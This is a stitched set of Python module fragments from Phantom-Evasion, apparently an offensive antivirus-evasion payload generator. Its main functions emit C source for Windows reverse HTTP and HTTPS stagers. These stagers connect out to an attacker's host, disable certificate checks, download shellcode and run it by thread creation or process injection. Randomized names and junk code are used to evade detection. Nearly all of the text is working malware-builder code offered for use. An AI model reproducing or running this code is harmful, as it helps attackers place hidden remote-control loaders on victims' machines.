# You should have received a copy of the GNU General Public License # # along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. # # # ######################################################################################## import sys from random import shuffle sys.path.append("Modules/payloads/auxiliar") from usefull import varname_creator from usefull import Junkmathinject from usefull import windows_evasion from usefull import spawn_multiple_process from usefull import close_brackets_multiproc from usefull import CheckForBackslash PathOrFilename = CheckForBackslash(sys.argv[1]) Procname = sys.argv[2] WaitBeforeCheck = sys.argv[3] Evasion_Junkcode = sys.argv[4] SpawnMultiProc = int(sys.argv[5]) RandBool = varname_creator() RandEntry = varname_creator() RandHandle = varname_creator()
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. # # # ######################################################################################## import sys from random import shuffle from random import sample sys.path.append("Modules/payloads/auxiliar") from usefull import varname_creator from usefull import Junkmathinject from usefull import windows_evasion from usefull import spawn_multiple_process from usefull import close_brackets_multiproc from usefull import CheckForBackslash Lhost = CheckForBackslash(sys.argv[1]) Lport = sys.argv[2] SpawnMultiProc = int(sys.argv[3]) Randlpv = varname_creator() Randpointer = varname_creator() Randhand = varname_creator() Randthread = varname_creator() RandhInternet = varname_creator()
# GNU General Public License for more details. # # # # You should have received a copy of the GNU General Public License # # along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. # # # ######################################################################################## import sys from random import shuffle sys.path.append("Modules/payloads/auxiliar") from usefull import varname_creator from usefull import Junkmathinject from usefull import CheckForBackslash from usefull import generic_evasion BashOneliner = CheckForBackslash(sys.argv[1]) Randvarname = varname_creator() Randptr = varname_creator() # Random Junkcode Junkcode_01 = Junkmathinject() Junkcode_02 = Junkmathinject() Junkcode_03 = Junkmathinject() Junkcode_04 = Junkmathinject() Junkcode_05 = Junkmathinject() Junkcode_06 = Junkmathinject() Junkcode_07 = Junkmathinject() Junkcode_08 = Junkmathinject()
def RevHttpsStager_C_windows(ModOpt): MemAlloc = ModOpt["MemAlloc"] ExecMethod = ModOpt["ExecMethod"] ModOpt["Lhost"] = CheckForBackslash(ModOpt["Lhost"]) Randlpv = varname_creator() Randlpv2 = varname_creator() Randpointer = varname_creator() RandhInternet = varname_creator() RandhConnect = varname_creator() RandhRequest = varname_creator() RandwFlags = varname_creator() RandISOResult = varname_creator() RandisSend = varname_creator() RandwByteRead = varname_creator() RandisRead = varname_creator() SumValueFunc = varname_creator() RandCharArray = varname_creator() RandCharset = varname_creator() RandInteger = varname_creator() RandRecv_int = varname_creator() ChecksumFunction = varname_creator() RandCharPtr2 = varname_creator() RandFuncFlag1 = varname_creator() RandFuncFlag2 = varname_creator() Arch = ModOpt["Arch"] MemAlloc = ModOpt["MemAlloc"] ExecMethod = ModOpt["ExecMethod"] if ModOpt["MemAlloc"] in ["SharedSection", "SS"]: ModOpt["Buff"] = Randlpv ModOpt["Lpvoid"] = varname_creator() else: ModOpt["Buff"] = Randlpv ModOpt["Lpvoid"] = Randlpv ModOpt["Decoder"] = "False" ModOpt["Bufflen"] = "8000000" Ret_code = "" IncludeList = [ "#include <stdlib.h>\n", "#include <windows.h>\n", "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n", "#include <math.h>\n" ] Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n" Ret_code += "#include <wininet.h>\n" if ModOpt["Outformat"] == "exe": Ret_code += "int main(int argc,char * argv[]){\n" elif ModOpt["Outformat"] == "dll": if ModOpt["Reflective"] == True: Ret_code += "#include \"ReflectiveLoader.h\"\n" Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n" Ret_code += "BOOL bReturnValue = TRUE;\n" Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n" if ModOpt["DynImport"] == True: ModOpt["NtdllHandle"] = varname_creator() ModOpt["Ker32Handle"] = varname_creator() Ret_code += "HANDLE " + ModOpt[ "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n" Ret_code += "HANDLE " + ModOpt[ "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n" Ret_code += "$:START\n" Ret_code += WindowsDefend(ModOpt) #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"]) Ret_code += "$:EVA\n" if ModOpt["DynImport"] == True: ModOpt["NtdllHandle"] = varname_creator() ModOpt["Ker32Handle"] = varname_creator() Wininet = varname_creator() NdcInternetOpenA = varname_creator() NdcInternetConnectA = varname_creator() NdcHttpOpenRequestA = varname_creator() NdcInternetSetOption = varname_creator() NdcHttpSendRequestA = varname_creator() NdcInternetReadFile = varname_creator() Ret_code += "HANDLE " + ModOpt[ "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n" Ret_code += "HANDLE " + ModOpt[ "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n" Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n" Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n" Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n" Ret_code += "if (" + RandhInternet + " != NULL){\n" Ret_code += "FARPROC " + NdcInternetConnectA + " = GetProcAddress(" + Wininet + ", \"InternetConnectA\");\n" Ret_code += "HINTERNET " + RandhConnect + " = (HINTERNET)" + NdcInternetConnectA + "(" + RandhInternet + ", \"" + ModOpt[ "Lhost"] + "\"," + ModOpt[ "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n" Ret_code += "if (" + RandhConnect + " != NULL){\n" Ret_code += "FARPROC " + NdcHttpOpenRequestA + " = GetProcAddress(" + Wininet + ", \"HttpOpenRequestA\");\n" Ret_code += "HINTERNET " + RandhRequest + " = (HINTERNET)" + NdcHttpOpenRequestA + "(" + RandhConnect + ",NULL,\"" + UriGenerator( ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n" Ret_code += "if (" + RandhRequest + "!= NULL){\n" Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n" Ret_code += "FARPROC " + NdcInternetSetOption + " = GetProcAddress(" + Wininet + ", \"InternetSetOption\");\n" Ret_code += "BOOL " + RandISOResult + " = " + NdcInternetSetOption + "(" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n" Ret_code += "LPVOID " + Randlpv + ";\n" Ret_code += inject_utils.Win_MemLocal(ModOpt) Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n" Ret_code += "FARPROC " + NdcHttpSendRequestA + " = GetProcAddress(" + Wininet + ", \"HttpSendRequestA\");\n" Ret_code += "BOOL " + RandisSend + " = " + NdcHttpSendRequestA + "(" + RandhRequest + ", NULL, 0, NULL, 0);\n" Ret_code += "if (" + RandisSend + "){\n" Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n" Ret_code += "DWORD " + RandwByteRead + ";\n" Ret_code += "do{\n" Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhRequest + "," + Randpointer + ", 1024, &" + RandwByteRead + ");\n" else: Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n" Ret_code += "if (" + RandhInternet + " != NULL){\n" Ret_code += "HINTERNET " + RandhConnect + " = InternetConnectA(" + RandhInternet + ",\"" + ModOpt[ "Lhost"] + "\"," + ModOpt[ "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n" Ret_code += "if (" + RandhConnect + " != NULL){\n" Ret_code += "HINTERNET " + RandhRequest + " = HttpOpenRequestA(" + RandhConnect + ",NULL,\"" + UriGenerator( ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n" Ret_code += "if (" + RandhRequest + "!= NULL){\n" Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n" Ret_code += "BOOL " + RandISOResult + " = InternetSetOption (" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n" Ret_code += "LPVOID " + Randlpv + ";\n" Ret_code += inject_utils.Win_MemLocal(ModOpt) Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n" Ret_code += "BOOL " + RandisSend + " = HttpSendRequestA(" + RandhRequest + ", NULL, 0, NULL, 0);\n" Ret_code += "if (" + RandisSend + "){\n" Ret_code += "DWORD " + RandwByteRead + ";\n" Ret_code += "do{\n" Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhRequest + "," + Randpointer + ",8192, &" + RandwByteRead + ");\n" Ret_code += Randpointer + " += " + RandwByteRead + ";\n" Ret_code += "}while(" + RandwByteRead + " > 0);\n" if "RW/" in MemAlloc and ExecMethod == "Thread": Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt) if ModOpt["ExecMethod"] == "Thread": Ret_code += inject_utils.Win_LocalThread(ModOpt) else: Ret_code += inject_utils.Win_RemoteInjection(ModOpt) Ret_code += "}}}}\n" Ret_code += "$:END\n" #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"]) Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"], ModOpt["JR"]) if ModOpt["Outformat"] == "exe": Ret_code += "return 0;}" elif ModOpt["Outformat"] == "dll": Ret_code += "}\n" Ret_code += "return bReturnValue;}\n" WriteSource("Source.c", Ret_code)
# You should have received a copy of the GNU General Public License # # along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. # # # ######################################################################################## import sys from random import shuffle sys.path.append("Modules/payloads/auxiliar") from usefull import varname_creator from usefull import Junkmathinject from usefull import windows_evasion from usefull import spawn_multiple_process from usefull import close_brackets_multiproc from usefull import CheckForBackslash Powershell_payload = CheckForBackslash(sys.argv[1]) SpawnMultiProc = int(sys.argv[2]) Randvarname = varname_creator() Junkcode_01 = Junkmathinject() Junkcode_02 = Junkmathinject() Junkcode_03 = Junkmathinject() Junkcode_04 = Junkmathinject() Junkcode_05 = Junkmathinject() Junkcode_06 = Junkmathinject() Junkcode_07 = Junkmathinject() Junkcode_08 = Junkmathinject() Junkcode_09 = Junkmathinject() Junkcode_10 = Junkmathinject()
def RevHttpStager_C_windows(ModOpt): Lhost = CheckForBackslash(ModOpt["Lhost"]) Lport = ModOpt["Lport"] MemAlloc = ModOpt["MemAlloc"] ExecMethod = ModOpt["ExecMethod"] Randlpv = varname_creator() Randlpv2 = varname_creator() Randpointer2 = varname_creator() Randbuff = varname_creator() Randversion = varname_creator() Randwsadata = varname_creator() RandRevtarget = varname_creator() Randsock = varname_creator() RandSocket = varname_creator() RandRecv_int = varname_creator() Arch = ModOpt["Arch"] MemAlloc = ModOpt["MemAlloc"] ExecMethod = ModOpt["ExecMethod"] if ModOpt["MemAlloc"] in ["SharedSection", "SS"]: ModOpt["Buff"] = Randlpv ModOpt["Lpvoid"] = varname_creator() else: ModOpt["Buff"] = Randlpv ModOpt["Lpvoid"] = Randlpv ModOpt["Decoder"] = "False" ModOpt["Bufflen"] = "1000000" Ret_code = "" Ret_code += "#define _WIN32_WINNT 0x0500\n" Ret_code += "#include <winsock2.h>\n" IncludeList = [ "#include <stdlib.h>\n", "#include <windows.h>\n", "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n", "#include <math.h>\n" ] Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n" if ModOpt["Outformat"] == "exe": Ret_code += "int main(int argc,char * argv[]){\n" elif ModOpt["Outformat"] == "dll": if ModOpt["Reflective"] == True: Ret_code += "#include \"ReflectiveLoader.h\"\n" Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n" Ret_code += "BOOL bReturnValue = TRUE;\n" Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n" if ModOpt["DynImport"] == True: ModOpt["NtdllHandle"] = varname_creator() ModOpt["Ker32Handle"] = varname_creator() Ret_code += "HANDLE " + ModOpt[ "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n" Ret_code += "HANDLE " + ModOpt[ "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n" Ret_code += "$:START\n" Ret_code += WindowsDefend(ModOpt) #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"]) Ret_code += "$:EVA\n" Ret_code += "char * " + Randlpv + ";\n" Ret_code += "WORD " + Randversion + " = MAKEWORD(2,2);WSADATA " + Randwsadata + ";\n" if ModOpt["DynImport"] == True: ModOpt["NtdllHandle"] = varname_creator() ModOpt["Ker32Handle"] = varname_creator() WS2_32 = varname_creator() NdcWSAStartup = varname_creator() NdcWSACleanup = varname_creator() Ret_code += "HANDLE " + ModOpt[ "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n" Ret_code += "HANDLE " + ModOpt[ "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n" Ret_code += "HANDLE " + WS2_32 + " = GetModuleHandle(\"ws2_32.dll\");\n" Ret_code += "FARPROC " + NdcWSAStartup + " = GetProcAddress(" + WS2_32 + ", \"WSAStartup\");\n" Ret_code += "FARPROC " + NdcWSACleanup + " = GetProcAddress(" + WS2_32 + ", \"WSACleanup\");\n" Ret_code += "if (" + NdcWSAStartup + "(" + Randversion + ", &" + Randwsadata + ") < 0){" Ret_code += NdcWSACleanup + "();exit(1);}\n" else: Ret_code += "if (WSAStartup(" + Randversion + ", &" + Randwsadata + ") < 0){\n" Ret_code += "WSACleanup();exit(1);}\n" Ret_code += "struct hostent * " + RandRevtarget + ";struct sockaddr_in " + Randsock + ";SOCKET " + RandSocket + ";\n" Ret_code += RandSocket + " = socket(AF_INET, SOCK_STREAM, 0);\n" if ModOpt["DynImport"] == True: Ret_code += "if (" + RandSocket + " == INVALID_SOCKET){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n" Ret_code += RandRevtarget + " = gethostbyname(\"" + ModOpt[ "Lhost"] + "\");\n" #Lhost if ModOpt["DynImport"] == True: Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}\n" else: Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n" Ret_code += "memcpy(&" + Randsock + ".sin_addr.s_addr, " + RandRevtarget + "->h_addr, " + RandRevtarget + "->h_length);\n" Ret_code += Randsock + ".sin_family = AF_INET;\n" Ret_code += Randsock + ".sin_port = htons((" + ModOpt[ "Lport"] + "));\n" #Lport Ret_code += "if ( connect(" + RandSocket + ", (struct sockaddr *)&" + Randsock + ", sizeof(" + Randsock + ")) ){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n" Ret_code += "char " + Randbuff + "[400] = \"GET /" + UriGenerator( ) + " HTTP/1.1\\r\\nHost: " + Lhost + ":" + Lport + "\\r\\nConnection: Keep-Alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\\r\\n\\r\\n\";\n" Ret_code += "send(" + RandSocket + "," + Randbuff + ", strlen( " + Randbuff + " ),0);\n" Ret_code += "Sleep(300);\n" Ret_code += inject_utils.Win_MemLocal(ModOpt) Ret_code += "char * " + Randpointer2 + " = " + Randlpv + ";\n" Ret_code += "int " + RandRecv_int + ";\n" Ret_code += "do {" + RandRecv_int + " = recv(" + RandSocket + ", " + Randpointer2 + ", 1024, 0);\n" Ret_code += "" + Randpointer2 + " += " + RandRecv_int + ";\n" Ret_code += "}while ( " + RandRecv_int + " > 0 );\n" if ModOpt["DynImport"] == True: Ret_code += "closesocket(" + RandSocket + ");" + NdcWSACleanup + "();\n" else: Ret_code += "closesocket(" + RandSocket + ");WSACleanup();\n" if "RW/" in MemAlloc and ExecMethod == "Thread": Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt) Ret_code += Randlpv + " = strstr(" + Randlpv + ", \"\\r\\n\\r\\n\") + 4;\n" if ModOpt["ExecMethod"] == "Thread": Ret_code += inject_utils.Win_LocalThread(ModOpt) else: Ret_code += inject_utils.Win_RemoteInjection(ModOpt) Ret_code += "$:END\n" #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"]) Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"], ModOpt["JR"]) if ModOpt["Outformat"] == "exe": Ret_code += "return 0;}" elif ModOpt["Outformat"] == "dll": Ret_code += "}\n" Ret_code += "return bReturnValue;}\n" WriteSource("Source.c", Ret_code)